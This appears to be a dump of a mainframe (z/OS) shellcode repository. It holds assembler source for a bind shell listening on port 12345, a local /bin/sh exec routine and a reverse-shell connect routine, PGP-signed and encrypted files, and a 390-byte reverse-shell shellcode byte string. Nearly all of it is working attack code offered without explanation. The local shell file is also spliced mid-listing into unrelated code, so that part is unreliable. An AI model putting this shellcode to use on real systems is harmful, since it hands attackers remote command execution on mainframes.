| STC 3,0(0,1) # store R3 byte back into cli buff 422 | AR 1,6 # increment client buff 423 | SR 4,6 # sub1 from ctr, loop if non-neg 424 | BRC 7,LOOP1 # looop 425 | BCR 15,14 # return to caller 426 | 427 | *********************************************************************** 428 | * * 429 | * CONVEA - convert CLIBUF ebcdic to ascii * 430 | * function looks up ebcdic byte and returns ascii * 431 | * expects return address in R14 * 432 | * * 433 | *********************************************************************** 434 | CONVEA LHI 6,1 # R6 has number 1 435 | L 4,BREAD # num of bytes read 436 | L 1,CLIBUF # address of cli sock input 437 | LOOP2 L 2,E2A # address of e2a buff 438 | SR 2,6 # subtract 1 from R2 addr 439 | LB 3,0(0,1) # Load byte from cli into R3 440 | NILF 3,X'FF' # make sure R3 is 1 positive byte 441 | AR 2,3 # add ascii val to e2a buff 442 | LB 3,0(0,2) # load byte from e2a buff into R3 443 | STC 3,0(0,1) # store R3 byte back into cli buff 444 | NILF 3,X'FF' # make sure R3 is 1 positive byte 445 | AR 1,6 # increment client buff 446 | SR 4,6 # sub1 from ctr, loop if non-neg 447 | BRC 7,LOOP2 # looop 448 | BCR 15,14 # return to caller 449 | 450 | **************************************************** 451 | * cleanup & exit * 452 | * preload R15 with exit code * 453 | **************************************************** 454 | GOODEX XR 15,15 # zero return code 455 | EXITP ST 15,0(,11) 456 | L 13,4(,11) 457 | LM 14,12,12(13) # restore registers 458 | LARL 5,SAVEAREA 459 | L 15,0(0,5) 460 | BCR 15,14 # branch to caller 461 | 462 | ********************** 463 | ********************** 464 | * * 465 | * Constant Sections * 466 | * * 467 | ********************** 468 | ********************** 469 | @CONST DS 0F # constants full word boundary 470 | SAVEAREA DC X'00000000' 471 | DC X'00000000' 472 | ALET DC F'0' 473 | O_NONBLOCK EQU X'04' # bit for nonblocking io 474 | EWOULDBLOCK EQU X'44E' # rtncod for nonblk read sock 475 | EAGAIN EQU X'70' # rtncod for nonblk, not thr 476 | ************************* 477 | * Function addresses * # pipe variables 478 | ************************* 479 | FFUNC DC A(BFRK) # address of first function 480 | NUMFUNC DC F'11' # number of funcs listed below 481 | BFRK DC CL8'BPX1FRK ' # Fork 482 | BEXC DC CL8'BPX1EXC ' # Exec 483 | BSOC DC CL8'BPX1SOC ' # Socket 484 | BBND DC CL8'BPX1BND ' # Bind 485 | BLSN DC CL8'BPX1LSN ' # Listen 486 | BACP DC CL8'BPX1ACP ' # Accept 487 | BRED DC CL8'BPX1RED ' # Read 488 | BWRT DC CL8'BPX1WRT ' # Write 489 | BCLO DC CL8'BPX1CLO ' # Close 490 | BFCT DC CL8'BPX1FCT ' # Fcntl 491 | BPIP DC CL8'BPX1PIP ' # Pipe 492 | ************************* 493 | * Socket conn variables * # functions used by pgm 494 | ************************* 495 | LISTSOCK DC XL2'3039' # port 12345 496 | LISTADDR DC XL4'00000000' # address 0.0.0.0 497 | BACKLOG DC F'1' # 1 byte backlog 498 | DOM DC A(AF_INET) # AF_INET = 2 499 | TYPE DC A(SOCK#_STREAM) # stream = 1 500 | PROTO DC A(IPPROTO_IP) # ip = 0 501 | DIM DC A(SOCK#DIM_SOCKET) # dim_sock = 1 502 | SRVFD DC A(*) # server FD 503 | SRVSKT DC 16XL1'77' # srv socket struct 504 | SOCKLEN DC A(SOCK#LEN+SOCK_SIN#LEN) 505 | CLILEN DC A(*) # len of client struct 506 | CLISKT DC 16XL1'88' # client socket struct 507 | CLIFD DC A(*) # client fd 508 | ************************ 509 | * BPX1PIP vars ********* # pipe variables 510 | ************************ 511 | CFDR DC F'0' # child proc FD read 512 | CFDW DC F'0' # child proc FD write 513 | PFDR DC F'0' # parent proc FD read 514 | PFDW DC F'0' # parent proc FD write 515 | ************************ 516 | * BPX1FRK vars ********* 517 | ************************ 518 | CPROCN DC F'-1' # child proc # 519 | ************************ 520 | * BPX1EXC vars ********* 521 | ************************ 522 | EXCMD DC CL7'/bin/sh' # command to exec 523 | EXCMDL DC A(L'EXCMD) # len of cmd to exec 524 | EXARGC DC F'1' # num of arguments 525 | EXARG1 DC CL2'sh' # arg 1 to exec 526 | EXARG1L DC A(L'EXARG1) # len of arg1 527 | EXARGL DC A(EXARG1) # addr of argument list 528 | EXARGLL DC A(EXARG1L) # addr of arg len list 529 | EXENVC DC F'0' # env var count 530 | EXENVL DC F'0' # env var arg list addr 531 | EXENVLL DC F'0' # env var arg len addr 532 | EXITRA DC F'0' # exit routine addr 533 | EXITPLA DC F'0' # exit rout parm list addr 534 | ************************** 535 | * Socket read/write vars * 536 | ************************** 537 | CLIREAD DC F'52' # one less than buf 538 | CLIBUF DC A(@CBUF) # buff for read cli sock 539 | @CBUF DC XL52'22' # buffer for bytes read 540 | BREAD DC F'0' # bytes read 541 | BWRIT DC F'0' # bytes written 542 | ********************* 543 | * Return value vars * 544 | ********************* 545 | RTN_VAL DC A(*) # return value 546 | RTN_COD DC A(*) # return code 547 | RSN_COD DC A(*) # reason code 548 | *************************** 549 | ***** end of constants **** 550 | *************************** 551 | **************************************************** 552 | * ebcdic to ascii lookup * 553 | * read hex(ebcdic char) bytes from beginning of * 554 | * array to get ascii byte * 555 | **************************************************** 556 | E2ABUF DC X'0102039c09867f978d8e0b0c0d0e0f101112139d0a08871819928fX 557 | 1c1d1e1f808182838485171b88898a8b8c0506079091169394959604X 558 | 98999a9b14159e1a20a0e2e4e0e1e3e5e7f1a22e3c282b7c26e9eaebX 559 | e8edeeefecdf21242a293b5e2d2fc2c4c0c1c3c5c7d1a62c255f3e3fX 560 | f8c9cacbc8cdcecfcc603a2340273d22' 561 | DC X'd8616263646566676869abbbf0fdfeb1b06a6b6c6d6e6f707172aaX 562 | bae6b8c6a4b57e737475767778797aa1bfd05bdeaeaca3a5b7a9a7b6X 563 | bcbdbedda8af5db4d77b414243444546474849adf4f6f2f3f57d4a4bX 564 | 4c4d4e4f505152b9fbfcf9faff5cf7535455565758595ab2d4d6d2d3X 565 | d530313233343536373839b3dbdcd9da' 566 | DC X'9f' 567 | E2A DC A(E2ABUF) 568 | **************************************************** 569 | * ascii to ebcdic lookup * 570 | * read hex(ascii char) bytes from beginning of * 571 | * array to get ebcdic byte * 572 | **************************************************** 573 | A2EBUF DC X'010203372d2e2f1605150b0c0d0e0f101112133c3d322618193f27X 574 | 1c1d1e1f405a7f7b5b6c507d4d5d5c4e6b604b61f0f1f2f3f4f5f6f7X 575 | f8f97a5e4c7e6e6f7cc1c2c3c4c5c6c7c8c9d1d2d3d4d5d6d7d8d9e2X 576 | e3e4e5e6e7e8e9ade0bd5f6d79818283848586878889919293949596X 577 | 979899a2a3a4a5a6a7a8a9c04fd0a107' 578 | DC X'202122232425061728292a2b2c090a1b30311a333435360838393aX 579 | 3b04143eff41aa4ab19fb26ab5bbb49a8ab0caafbc908feafabea0b6X 580 | b39dda9b8bb7b8b9ab6465626663679e687471727378757677ac69edX 581 | eeebefecbf80fdfefbfcbaae594445424643479c4854515253585556X 582 | 578c49cdcecbcfcce170dddedbdc8d8e' 583 | DC X'df' 584 | A2E DC A(A2EBUF) 585 | BPXYSOCK LIST=YES # MACRO MAP for socket structure 586 | BPXYFCTL LIST=YES # MACRO MAP for fcntl structure 587 | END @SETUP 588 | -------------------------------------------------------------------------------- /bind-shell/shell_bind.s.asc: -------------------------------------------------------------------------------- 1 | -----BEGIN PGP SIGNATURE----- 2 | Comment: GPGTools - https://gpgtools.org 3 | 4 | iQEcBAABCgAGBQJV+a0cAAoJEFm08ZUdCG4Y39oIAISIJVJdQXFwAAwZ40TfZYob 5 | zdtDw5H4qMZ4FTLDcOZgCTTwjG5KgrKfU8DZqDEekAVbTENzjH8Wh7LTdZ4OAsiS 6 | cpcHEgkx+7tgF26FZVUN96y4HCMCLjr+ylNq0++pcfXd/2WNI0lK81ahhZx4OKGj 7 | gaNdrrQylsCvo7wTPW2C+l9lC7vKmo1fG+/hlT1Nv3lCXjoEgzHzRysI2DWLnpig 8 | sS1m4vBeHi7vkMBGFyPunXhOWU4BO3BIXLcJJsv2GP9lfR2pVtj3+l0ChMHUpeJp 9 | vabEJb4XGOujOfUQcf9jv0Y3Etcwx7dnam2c56nmHAr8oejHNefBB07drmGZfvM= 10 | =powy 11 | -----END PGP SIGNATURE----- 12 | -------------------------------------------------------------------------------- /local-exec-shell/local_shell.s: -------------------------------------------------------------------------------- 1 | TITLE 'pop shell for shell code' 2 | NSHELL CSECT 3 | NSHELL AMODE 31 4 | NSHELL RMODE ANY 5 | ENTRY MAIN 6 | MAIN DS 0F 7 | STM 14,12,12(13) # save our registers 8 | LARL 15,MAIN 9 | LR 8,15 10 | USING MAIN,8 # give us some addressability 11 | LARL 11,SAVEAREA # sa address 12 | ST 13,0(,11) # save caller's save area 13 | LR 13,11 14 | DS 0H 15 | BRAS 0,BEGIN 16 | FNAME DC C'BPX1EXC ' 17 | DC X'0' 18 | BEGIN LARL 0,FNAME 19 | XR 1,1 20 | SVC 8 21 | ST 0,GETENTRY # GETENTRY addr of bpx1exc call 22 | L 15,GETENTRY 23 | LA 6,FULLARG # FULLARG is arg stack for func call 24 | LR 1,6 # R1 has base of FULLARG for later call 25 | *********************************************************************** 26 | * What follows is the arguments for the BPX1EXC callable service * 27 | * built like this for compaction of the code * 28 | * "args" refer to the args of the BPX1EXC call itself * 29 | * "parms" refer to the parameters of the exec'd cmd (here /bin/sh) * 30 | * * 31 | *********************************************************************** 32 | LA 7,PATHLEN 33 | ST 7,0(,6) # store it's addr in first slot 34 | LA 7,PATH 35 | ST 7,4(,6) 36 | LA 7,ARGC 37 | ST 7,8(,6) 38 | * list of addresses of parms lengths 39 | LA 7,ARGLL # ARGLL - arg 4 40 | ST 7,12(,6) 41 | * individual parms lengths 42 | LA 9,ARG1L # shell parm len 1 43 | ST 9,0(,7) # store in length list slot 1 44 | LA 9,ARG2L # arg2 len 2 45 | ST 9,4(,7) # store in length list slot 2 46 | LA 9,ARG3L # arg3 len 16 47 | ST 9,8(,7) # store in length list slot 3 48 | * list of addresses of parms 49 | LA 7,ARGLIST # ARGLIST - arg 5 50 | ST 7,16(,6) 51 | * individual parms 52 | LA 9,ARG1 # parm1 is null 53 | ST 9,0(,7) 54 | LA 9,ARG2 # parm2 is "-c" 55 | ST 9,4(,7) 56 | LA 9,ARG3 # parm3 ensures valid stdin 57 | ST 9,8(,7) 58 | * 0 is used for the last 8 args ENVC,ENVLL,ENVLIST,EXITADR, 59 | * EXITPGM,RTNVAL,RTNCODE,RSNCODE 60 | LA 7,ZERO 61 | ST 7,20(,6) 62 | ST 7,24(,6) 63 | ST 7,28(,6) 64 | ST 7,32(,6) 65 | ST 7,36(,6) 66 | ST 7,40(,6) 67 | ST 7,44(,6) 68 | * for last arg need to add 0x80000000 (per asm callable svcs) 69 | XILF 7,X'80000000' 70 | ST 7,48(,6) 71 | AHI 6,4 72 | GO BALR 14,15 73 | * cleanup 74 | L 13,0(,11) 75 | LM 14,12,12(13) # restore registers 76 | XR 15,15 # zero return code 77 | BCR 15,14 # branch to caller 78 | DS 0F # constants area 79 | GETENTRY DC X'00000000' 80 | SAVEAREA DC X'00000000' 81 | PATHLEN DC F'7' # PATHLEN - arg 1 82 | PATH DC C'/bin/sh' # PATH - arg 2 83 | ARGC DC F'3' # ARGC - arg 3 84 | ARG1 DC XL1'0' 85 | ARG2 DC CL2'-c' 86 | ARG3 DC C'/bin/sh R7=0 * 116 | * for close, set R2=F_CLOSFD * 117 | * R5=R6 = fd to close (optionally R5 & R6 can be a range * 118 | * of FDs to close) * 119 | * * 120 | *********************************************************************** 121 | LFCNTL L 15,BFCT # load func addr to 15 122 | ST 14,SAVEAREA # save return address 123 | ST 5,@FFD # fd to be duplicated 124 | ST 2,@ACT # action field for BPX1FCT 125 | ST 6,@ARG # r6 should have the biggest fd 126 | BRAS 0,@FCTL 127 | @FFD DC F'0' 128 | @ACT DC F'0' 129 | @ARG DC F'0' 130 | @RETFD DC F'0' 131 | @FCTL CALL (15),(@FFD,@ACT,@ARG,@RETFD,RTN_COD,RSN_COD),VL 132 | **************************************************** 133 | * chk return code here anything but -1 is ok * 134 | **************************************************** 135 | LHI 15,11 # exit code for this func 136 | L 7,@RETFD # set r6 to rtn val 137 | CIB 7,-1,8,EXITP # r6 = -1 exit 138 | L 14,SAVEAREA # reload ret address 139 | BCR 15,14 # return to caller 140 | 141 | **************************************************** 142 | * cleanup & exit * 143 | * preload R15 with exit code * 144 | **************************************************** 145 | GOODEX XR 15,15 # zero return code 146 | EXITP ST 15,0(,11) 147 | L 13,4(,11) 148 | LM 14,12,12(13) # restore registers 149 | LARL 5,SAVEAREA 150 | L 15,0(0,5) 151 | BCR 15,14 # branch to caller 152 | 153 | ********************** 154 | ********************** 155 | * * 156 | * Constant Sections * 157 | * * 158 | ********************** 159 | ********************** 160 | @CONST DS 0F # constants full word boundary 161 | SAVEAREA DC X'00000000' 162 | DC X'00000000' 163 | ALET DC F'0' 164 | ************************* 165 | * Function addresses * # pipe variables 166 | ************************* 167 | FFUNC DC A(BSOC) # address of first function 168 | NUMFUNC DC F'5' # number of funcs listed below 169 | BSOC DC CL8'BPX1SOC ' # Socket 170 | BBND DC CL8'BPX1BND ' # Bind 171 | BCON DC CL8'BPX1CON ' # Connect 172 | BFCT DC CL8'BPX1FCT ' # Fcntl 173 | BEXC DC CL8'BPX1EXC ' # Exec 174 | ************************* 175 | * Socket conn variables * # functions used by pgm 176 | ************************* 177 | CONNSOCK DC XL2'3039' # port 12345 178 | CONNADDR DC XL4'00000000' # address 0.0.0.0 179 | BACKLOG DC F'1' # 1 byte backlog 180 | DOM DC A(AF_INET) # AF_INET = 2 181 | TYPE DC A(SOCK#_STREAM) # stream = 1 182 | PROTO DC A(IPPROTO_IP) # ip = 0 183 | DIM DC A(SOCK#DIM_SOCKET) # dim_sock = 1 184 | SRVSKT DC 16XL1'77' # srv socket struct 185 | SOCKLEN DC A(SOCK#LEN+SOCK_SIN#LEN) 186 | CLILEN DC A(*) # len of client struct 187 | CLISKT DC 16XL1'88' # client socket struct 188 | CLIFD DC A(*) # client fd 189 | ************************ 190 | * BPX1EXC vars ********* 191 | ************************ 192 | EXCMD DC CL7'/bin/sh' # command to exec 193 | EXCMDL DC A(L'EXCMD) # len of cmd to exec 194 | EXARGC DC F'1' # num of arguments 195 | EXARG1 DC CL2'sh' # arg 1 to exec 196 | EXARG1L DC A(L'EXARG1) # len of arg1 197 | EXARGL DC A(EXARG1) # addr of argument list 198 | EXARGLL DC A(EXARG1L) # addr of arg len list 199 | EXENVC DC F'0' # env var count 200 | EXENVL DC F'0' # env var arg list addr 201 | EXENVLL DC F'0' # env var arg len addr 202 | EXITRA DC F'0' # exit routine addr 203 | EXITPLA DC F'0' # exit rout parm list addr 204 | ********************* 205 | * Return value vars * 206 | ********************* 207 | RTN_VAL DC A(*) # return value 208 | RTN_COD DC A(*) # return code 209 | RSN_COD DC A(*) # reason code 210 | *************************** 211 | ***** end of constants **** 212 | *************************** 213 | BPXYSOCK LIST=YES # MACRO MAP for socket structure 214 | BPXYFCTL LIST=YES # MACRO MAP for fcntl structure 215 | END @SETUP 216 | -------------------------------------------------------------------------------- /reverse-shell/reverse-shell-noenc.s.asc: -------------------------------------------------------------------------------- 1 | -----BEGIN PGP MESSAGE----- 2 | Comment: GPGTools - https://gpgtools.org 3 | 4 | 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 58 | h6WJrQ7flnh8sWzIkUocqWR2RrJdOZAOaVC4ZIxogpib1Iig/KHJEcreEGwr2Ibt 59 | zZHK3pHE9IB0ADRmS9pl2dZwQC/YfFSdzmz3gqIT8F6I1ySnVt1+ClreIeGenbCW 60 | D5t2jSM7RE3gJ4y9AFg7x08iY9ZrjsXXJ1YDLyhB+TqLFL812TVgj4SPGBDsq/xS 61 | ChJPc3612AixUZFktQafdXbQiOSboU2iVPiRbCwVNtHaiUiR1fljjWJzqS7cdvCK 62 | QwcOCgfectGblg8d3jogvO3dq4++cs+Vh83Lz7z+1tfnfqt9643vr33ksrV34tPX 63 | 3vnL+2rLt77/3uPVJ7XhrT9rXvzomZ5Z/e53nnl1+oM3Pocv/cllr33+m92v//6h 64 | Azfc8JU/n7nq5Tdee+beL98q/fuJyvP3/f0X73jugT+s3/DURfrK3/7yYtq+472/ 65 | Oo1fKFv3Pva1B74wPH1ftvjq9JefOHzFsz+8+/ZLn3/w5TtP9X9+6pN/uv/UX4fl 66 | Q59715m7DuIXHrnquvsf+gT6wOqPP9qSLlGeevbxyaPOY7+59g7rxNP/kD/0+NPD 67 | Gx8uOmsv/fGiZ099wzx54uHb/vODT93+r8sKD15zy/vqX/rn01/MPPzkafn6W05e 68 | /uvW5k23f/vTd33mv5s/fel7uXvec6V29KXZidmFH739rhdvueSz1u/kr374fw== 69 | =U2Rb 70 | -----END PGP MESSAGE----- 71 | -------------------------------------------------------------------------------- /reverse-shell/sr_shellcode.txt: -------------------------------------------------------------------------------- 1 | # length 390 2 | "\x90\xec\xd0\x0c\x18\x0f\x18\x80\x50\xd8\x01\x98\x41\x90\x00\x01" 3 | "\x50\x98\x01\x94\x41\xc0\x00\x04\x41\xd8\x01\x3c\x58\xf8\x01\x54" 4 | "\x41\x18\x01\xb4\x41\x78\x01\x8c\x50\x70\x10\x08\x41\x78\x01\x94" 5 | "\x50\x70\x10\x04\x50\x70\x10\x0c\x41\x78\x01\x80\x50\x70\x10\x00" 6 | "\x41\x78\x01\xa0\x50\x70\x10\x10\x41\x38\x01\xc8\x41\x50\x00\x02" 7 | "\x0d\xad\x58\xf8\x01\x58\x41\x18\x01\xb4\x41\x78\x01\xa0\x50\x78" 8 | "\x01\xb4\x41\x78\x01\x70\x50\x78\x01\xb8\x41\x78\x01\x74\x50\x78" 9 | "\x01\xbc\x41\x38\x01\xc0\x41\x50\x00\x02\x0d\xad\x58\x58\x01\xa0" 10 | "\x17\x66\xa7\xb5\x00\x43\x58\x58\x01\xa0\x41\x60\x00\x01\xa7\xb5" 11 | "\x00\x3d\x58\x58\x01\xa0\x41\x60\x00\x02\xa7\xb5\x00\x37\x58\xf8" 12 | "\x01\x5c\x41\x18\x01\xb4\x41\x78\x01\x64\x50\x70\x10\x00\x1a\x7c" 13 | "\x50\x70\x10\x04\x41\x78\x01\x94\x50\x70\x10\x08\x41\x78\x01\x80" 14 | "\x50\x78\x01\xac\x41\x78\x01\xac\x50\x70\x10\x0c\x41\x78\x01\x6c" 15 | "\x1a\x79\x50\x78\x01\xb0\x41\x78\x01\xb0\x50\x70\x10\x10\x41\x78" 16 | "\x01\x8c\x50\x70\x10\x14\x50\x70\x10\x18\x50\x70\x10\x1c\x50\x70" 17 | "\x10\x20\x50\x70\x10\x24\x41\x38\x01\xdc\x41\x50\x00\x02\x0d\xad" 18 | "\x41\xd8\x01\x98\x17\xff\x07\xfe\x58\xf8\x01\x60\x41\x18\x01\xb4" 19 | "\x50\x58\x01\xa4\x50\x68\x01\xa8\x41\x78\x01\xa4\x50\x70\x10\x00" 20 | "\x41\x78\x01\x7c\x50\x70\x10\x04\x41\x78\x01\xa8\x50\x70\x10\x08" 21 | "\x41\x38\x01\xc0\x41\x50\x00\x02\x0d\xad\x07\xfb\x50\x30\x30\x00" 22 | "\x1a\x3c\x1b\x59\x07\x7d\xa5\x3a\x80\x00\x50\x30\x30\x00\x05\xef" 23 | "\x07\xfa\x00\x00\x01\x53\x37\x10\x01\x53\x36\x3e\x01\x53\x33\xa4" 24 | "\x01\x53\x32\x4c\x00\x00\x00\x07\x61\x82\x89\x95\x61\xa2\x88\x00" 25 | "\x00\x00\x00\x10\x02\x02\x30\x39\x00\x00\x00\x00\x00\x00\x00\x08" 26 | "\x00\x00\x00\x02\x10\x02" 27 | --------------------------------------------------------------------------------